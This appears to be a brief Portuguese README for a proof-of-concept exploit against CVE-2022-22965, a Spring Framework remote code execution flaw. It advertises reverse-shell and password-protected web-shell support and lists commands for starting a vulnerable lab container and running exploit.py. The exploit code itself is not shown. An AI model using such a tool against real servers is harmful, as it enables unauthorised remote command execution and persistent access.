
PoC para CVE-2022-22965 incluindo suporte a reverse shell
CVE-2022-22965 poc incluindo suporte a reverse-shell e senha. Fique à vontade para adicionar mais coisas :)
$ docker run -p 9090:8080 vulfocus/spring-core-rce-2022-03-29 # run vulnerable docker
$ python3 exploit.py -c id --password 1234 --shell_name big0us
$ python3 exploit.py --help # for more usages
Refatorei o código do exploit original e adicionei alguns recursos